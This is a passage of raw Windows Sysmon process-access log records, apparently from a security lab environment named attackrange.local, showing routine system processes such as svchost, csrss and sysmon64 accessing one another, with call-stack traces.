22:15:00.016{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362620Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:00.016{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-1600-000000001100}1356C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\lsm.dll+1a207|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d 10341000x8000000000000000362619Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:00.016{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362618Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:00.016{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-1600-000000001100}1356C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\lsm.dll+1a207|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d 10341000x8000000000000000362617Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:00.016{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362616Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:00.016{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+f97f|c:\windows\system32\lsm.dll+f7ad|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362615Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:00.016{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+f6ba|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362614Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:00.016{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+f97f|c:\windows\system32\lsm.dll+f7ad|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362613Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:00.016{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+f6ba|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362612Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:00.016{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362611Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:00.016{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362610Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:00.016{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362623Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:04.603{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x800000000000000033109Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:08.756{FF16AF91-26E0-6013-8300-00000000A401}47605840C:\Windows\System32\RuntimeBroker.exe{FF16AF91-26E0-6013-8500-00000000A401}4892C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000033108Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:08.756{FF16AF91-26E0-6013-8300-00000000A401}47605840C:\Windows\System32\RuntimeBroker.exe{FF16AF91-26E0-6013-8500-00000000A401}4892C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x8000000000000000362624Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:14.638{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x800000000000000033118Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:18.630{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-3776-6013-8C03-00000000A401}2860C:\Program Files (x86)\Google\Update\GoogleUpdate.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033117Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:18.552{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033116Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:18.552{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033115Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:18.552{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033114Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:18.552{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033113Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:18.552{FF16AF91-26B4-6013-0500-00000000A401}644660C:\Windows\system32\csrss.exe{FF16AF91-3776-6013-8C03-00000000A401}2860C:\Program Files (x86)\Google\Update\GoogleUpdate.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000033112Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:18.552{FF16AF91-26B7-6013-1500-00000000A401}14922060C:\Windows\system32\svchost.exe{FF16AF91-3776-6013-8C03-00000000A401}2860C:\Program Files (x86)\Google\Update\GoogleUpdate.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e014|c:\windows\system32\UBPM.dll+115a2|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033111Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:18.552{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26B7-6013-1500-00000000A401}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033110Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:15:18.552{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26B7-6013-1500-00000000A401}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000362625Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 